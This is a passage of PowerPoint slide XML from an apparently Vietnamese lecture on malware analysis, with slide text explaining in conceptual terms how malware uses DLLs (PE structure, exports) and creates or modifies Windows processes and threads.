            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23459396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Các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>độc</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>năng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>độc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nhưng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hàm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mà</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> CT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>DLL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>độc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>độc</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Gọi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hàm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Windows (Windows DLL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Gọi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hàm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> DLL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thứ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cấu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trúc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>DLL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>giống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> 1 file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> (.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>exe – PE file format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>biệt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bằng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cờ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hiệu</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nhiều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hàm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> export </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hơn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> import</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19539408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err="1" smtClean="0"/>
              <a:t>Tiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> (process)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Mã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>độc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tạo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đổi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> 1 CT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>kích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoạt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nhiều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>luồng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> (threads) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>kích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoạt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> CPU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thường</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>độc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>độc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>độc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
